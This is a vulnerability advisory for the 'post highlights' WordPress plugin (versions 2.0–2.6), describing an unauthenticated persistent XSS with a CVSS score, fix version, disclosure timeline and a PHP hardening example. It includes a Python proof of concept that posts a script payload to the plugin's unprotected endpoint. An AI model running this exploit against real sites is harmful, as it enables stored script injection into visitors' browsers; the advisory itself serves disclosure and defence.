post highlights 2.0 - 2.6, Persistent XSS
Due to a script having no access protection, and including the ‘wp-load.php’ script, it is possible to update the ‘post highlights’ settings for any post. Using this flaw, you can enable ‘post highlights’ and insert arbitrary HTML content, which will then be output on the page. This output is not filtered or encoded, and as such allows any HTML content to be inserted, such as SCRIPT / IFRAME tags.
Homepage
https://wordpress.org/plugins/post-highlights/
CVSS Score
6.4
CVSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 2.6.1.
Proof of Concept
The following Python script will enable ‘post highlights’ on the post with ID ‘1’, and set the ‘headline’ field to an arbitrary piece of HTML, which results in a JavaScript alert being fired.
import requests

# Plugin AJAX endpoint: includes wp-load.php itself and performs no nonce or capability check
url = 'http://localhost/wp-content/plugins/post-highlights/ajax/ph_save.php'

# Step 1: enable 'post highlights' for the post with ID 1
payload = {
    "action": "highlight",
    "id": "1"
}
requests.post(url, data=payload)

# Step 2: set the 'headline' field; the value is stored and later output without encoding
payload = {
    "action": "headline",
    "id": "1",
    "txt": "<script>alert('.');</script>"
}
r = requests.post(url, data=payload)
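The root cause is the combination of a handler that accepts requests from anyone and a template that echoes the stored value raw. As an added illustration, not the plugin's own code, here is the vulnerable pattern beside a hardened handler built on standard WordPress APIs; the hook name, meta keys, nonce action and the `action_type` parameter are assumptions:

```php
<?php
// Added illustration, not the plugin's own code. Hook name, meta keys, nonce
// action ('ph_save') and the 'action_type' parameter are assumptions; the
// WordPress functions used are real.

// Vulnerable pattern described in the advisory: a standalone file boots
// WordPress itself and trusts every request, then the value is echoed raw.
//   require_once '../../../../wp-load.php';
//   update_post_meta((int) $_POST['id'], '_ph_headline', $_POST['txt']);
//   ... in the template: echo get_post_meta($post->ID, '_ph_headline', true);

// Hardened handler: routed through admin-ajax.php (so WordPress loads it) and
// only registered for logged-in users (no wp_ajax_nopriv_ hook).
add_action('wp_ajax_ph_save', 'ph_save_handler');

function ph_save_handler() {
    // 1. CSRF protection: the request must carry a nonce minted for this action.
    check_ajax_referer('ph_save', 'nonce');

    // 2. Authorization: the caller must be allowed to edit this specific post.
    $post_id = isset($_POST['id']) ? absint($_POST['id']) : 0;
    if (!$post_id || !current_user_can('edit_post', $post_id)) {
        wp_send_json_error('forbidden', 403);
    }

    // 'action' is reserved by admin-ajax.php, so the sub-action uses another key.
    $type = isset($_POST['action_type']) ? sanitize_key($_POST['action_type']) : '';
    switch ($type) {
        case 'highlight':
            update_post_meta($post_id, '_ph_enabled', 1);
            break;
        case 'headline':
            // 3. Input filtering: wp_kses_post() drops script/iframe and other
            //    markup not allowed in post content before it is stored.
            $txt = isset($_POST['txt']) ? wp_unslash($_POST['txt']) : '';
            update_post_meta($post_id, '_ph_headline', wp_kses_post($txt));
            break;
        default:
            wp_send_json_error('unknown action', 400);
    }
    wp_send_json_success();
}

// 4. Output encoding at render time: never echo stored meta raw. Use
//    wp_kses_post() here instead if the headline must keep limited markup.
function ph_render_headline($post_id) {
    if (!get_post_meta($post_id, '_ph_enabled', true)) {
        return '';
    }
    return esc_html(get_post_meta($post_id, '_ph_headline', true));
}
```

Filtering on input and encoding on output are independent controls; keeping both means a value that slips past one (for example via another write path) is still neutralised when rendered.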
Timeline
- 2014-10-09: Discovered
- 2014-10-09: Reported to vendor
- 2014-10-09: CVE requested
- 2014-10-11: CVE assigned
- 2014-10-27: Update requested from vendor
- 2014-11-03: Advisory released
- 2014-11-03: Vendor contacted with intent to fix after release of advisory
- 2014-11-03: Version 2.6.1 released – issue resolved